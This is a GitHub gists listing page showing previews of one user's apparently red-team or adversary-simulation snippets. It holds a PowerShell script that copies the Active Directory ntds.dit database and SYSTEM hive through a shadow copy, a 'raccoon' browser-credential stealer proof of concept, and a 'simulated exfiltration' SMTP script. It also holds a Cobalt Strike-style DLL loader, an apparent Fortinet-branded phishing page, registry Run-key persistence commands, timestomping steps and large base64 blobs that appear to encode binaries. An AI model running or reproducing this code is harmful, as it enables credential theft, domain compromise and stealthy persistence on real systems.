Toussaint Louverture justaguywhocodes
justaguywhocodes
/ timestomping
Created
January 26, 2026 17:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Step-by-Step Commands | |
| Install the PowerForensics Module (if not installed): | |
| powershell | |
| Copy | |
| Install-Module -Name PowerForensics -Force -Confirm:$false -Scope CurrentUser | |
| Create a Test File (e.g., C:\test\malicious.txt): | |
| powershell | |
| Copy |
justaguywhocodes
/ smtp.py
Created
January 23, 2026 20:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import smtplib | |
| from email.mime.text import MIMEText | |
| # CONFIGURATION (TEST CREDENTIALS ONLY) | |
| sender_email = "derekmartinsf@gmail.com" # Use a dedicated TEST account | |
| password = "yourpassword" # Generate an App Password: https://myaccount.google.com/apppasswords | |
| receiver_email = "accounting@bnp.bz"# Destination | |
| smtp_server = "smtp.gmail.com" | |
| port = 587 # TLS port | |
| message = "Simulated TrillClient data exfiltration test." |
justaguywhocodes
/ cobalt.txt
Created
January 19, 2026 19:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Create a Test DLL Loader | |
| Simulate a benign Cobalt Strike-style DLL loader. Save this as test_loader.c: | |
| c | |
| Copy | |
| #include <windows.h> | |
| // Export a function (common in Cobalt Strike loaders) | |
| __declspec(dllexport) void Run(void) { | |
| // Benign test action: create a temporary file | |
| HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\test_ttp_success.txt", |
justaguywhocodes
/ fortinet.html
Last active
January 16, 2026 15:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
| <title>Fortinet Secure File Access</title> | |
| <style> | |
| body { | |
| margin: 0; | |
| padding: 0; |
justaguywhocodes
/ cve.b64
Created
January 15, 2026 15:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| VUVzREJBb0FBQUFBQUdkSTRsSUFBQUFBQUFBQUFBQUFBQUFUQUFrQVExWkZMVEl3TWpFdE1UWTNOUzF0WVdsdUwxVlVCUUFCd3pqZllGQkxBd1FLQUFBQUNBQm5TT0pTV0syVEJVWGRBUUNCdVFJQUpBQUpBRU5XUlMweU1ESXhMVEUyTnpVdGJXRnBiaTlEVmtVdE1qQXlNUzB4TmpjMUxuQnpNVlZVQlFBQnd6amZZS3k2NlpMazFwRW0rbDlQa2MyaFdaTUdrVmdDVy9EZUhodnNPd0piWUZQTEpPeUJ3TDRHZ0psNTk0dXNqVlVpcFpabWJ0U1B6TUJ4UCs3SDNZLzc5NkV5WDlwa0xydjJUV3JYcnNwKzBzdmlNVGZSbVAzaGYvN2g3Zno4di8vdHc0LzN6ODkyb044TVc3Sy9QT0cydnU3S2VYcGpYTzRuQkVMZ24yQ2N3TjUrTU1heW5iL3M5T01mdmloUXkvem94dW1YTHcvZVAweFVaL0diUFdldmFKemZmbnA3ekhNLy9RS0NSVGsvbHZqbnBHdkE1RjFrK2lqeGphN2NQZG8zTVdxYXJrMS9YL1ZkNHBQQUY4MjdwZjd5WDVrQnZ6blRyMGY0bWVWc3hwSU1SN3JwLzJvZzN1cnVORkh2YjNQM0ZxWHBXL1RXWnErUEQ4L3ZUZG1XMHp4R2N6ZCsyWGlac3ZIdGRYcDR5bFp0OTJyZittaWFYdDJZL3Z4MjY5OFQ5NzdmSDkvbVJ6bTlKVkg3Rm1mdk91bTdoV3pMa21YTzN2WnVHZDlPMVMrYkpzczBkODBicTZwZmkwWHQvdGJOajlOZTBxWG4xK2xOZDk2b3V5UGVMTWtKL3RNT2JJZlRmdjRxRUFabFVScm5jTlliTzVack51cFJrMzFaZFI3WlczcytlT3Z5MDduc3cwSDc5MmljKzZjZnhEOEg0WWMweTZPbG5uOTUrODdwNWcvaDBidjVUWXZxTWltN1pmcnV4OSsxcVdldit4bWNmMmp3 |
justaguywhocodes
/ dll.b64
Created
January 15, 2026 14:26
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUVBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFEYjBkUlRuN0M2QUord3VnQ2ZzTG9BbHNncEFKdXd1Z0FZT2JrQm5MQzZBQmc1dmdHWHNMb0FHRG0vQVkrd3VnQVlPYnNCbUxDNkFPWXh1d0dic0xvQW43QzdBTEd3dWdBTE9iTUJuYkM2QUFzNVJRQ2VzTG9BQ3ptNEFaNnd1Z0JTYVdOb243QzZBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJraGdZQVV2Um9hUUFBQUFBQUFBQUE4QUFpSUFzQ0Rpd0FHQUFBQUNRQUFBQUFBQUJFSEFBQUFCQUFBQUFBQUlBQkFBQUFBQkFBQUFBQ0FBQUdBQUFBQUFBQUFBWUFBQUFBQUFBQUFKQUFBQUFFQUFBQUFBQUFBZ0JnQVFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUJBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFLUTlBQUNNQUFBQUFIQUFBUGdBQUFBQVlBQUFyQUlBQUFBQUFBQUFBQUFBQUlBQUFGZ0FBQUNRTkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQXpBQUJBQVFBQUFBQUFBQUFBQUFBQU1BQUFZQUVBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUFuQllBQUFBUUFBQUFHQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNtUmhkR0VBQURZVEFBQUFNQUFB |
justaguywhocodes
/ Get-NtdsDit.ps1
Created
January 13, 2026 15:00
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -RunAsAdministrator | |
| # Define paths | |
| $ntdsPath = "$env:SystemRoot\NTDS\ntds.dit" | |
| $systemHivePath = "$env:SystemRoot\System32\config\SYSTEM" | |
| $desktopPath = [Environment]::GetFolderPath("Desktop") | |
| $outputNTDS = Join-Path $desktopPath "ntds.dit" | |
| $outputSystem = Join-Path $desktopPath "SYSTEM" | |
| # Create Volume Shadow Copy |
justaguywhocodes
/ stealer.py
Created
January 13, 2026 13:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # raccoon_browser_steal_poc.py | |
| import os | |
| import sqlite3 | |
| import shutil | |
| from win32crypt import CryptUnprotectData # pip install pywin32 | |
| def find_browser_paths(): | |
| paths = [ | |
| os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data\Default"), | |
| os.path.expandvars(r"%LOCALAPPDATA%\Microsoft\Edge\User Data\Default"), |
justaguywhocodes
/ gsd.b64
Created
January 13, 2026 13:26
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFaSVlEQUFBQUFBQUFBQUFBQUFBQUFQQUFMZ0lMQWdJaUFQQUxBQUFRQUFBQVVCc0FvRWduQUFCZ0d3QUFBRUFBQUFBQUFBQVFBQUFBQWdBQUJnQUJBQUVBQUFBR0FBRUFBQUFBQUFCZ0p3QUFFQUFBQUFBQUFBTUFZSUVBQUNBQUFBQUFBQUFRQUFBQUFBQUFBQUFRQUFBQUFBQUFFQUFBQUFBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQVVDY0FuQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQlZVRmd3QUFBQUFBQlFHd0FBRUFBQUFBQUFBQUFDQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQURnVlZCWU1RQUFBQUFBOEFzQUFHQWJBQURzQ3dBQUFnQUFBQUFBQUFBQUFBQUFBQUFBUUFBQTRGVlFXRElBQUFBQUFCQUFBQUJRSndBQUFnQUFBTzRMQUFBQUFBQUFBQUFBQUFBQUFFQUFBTUF6TGprMkFGVlFXQ0VOSkFnSjlCMmhXbGZ5N0dldUxDY0FkdWdMQUFBMEl3QkpJZ0ErLy8vLy8vOGdSMjhnWW5WcGJHUWdTVVE2SUNJeWJtZFZlVzVN |
justaguywhocodes
/ gist:bc57be175667f0df8ab47d9862805887
Created
January 9, 2026 13:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer" /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f | |
| reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer" | |
| reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer" /f |
NewerOlder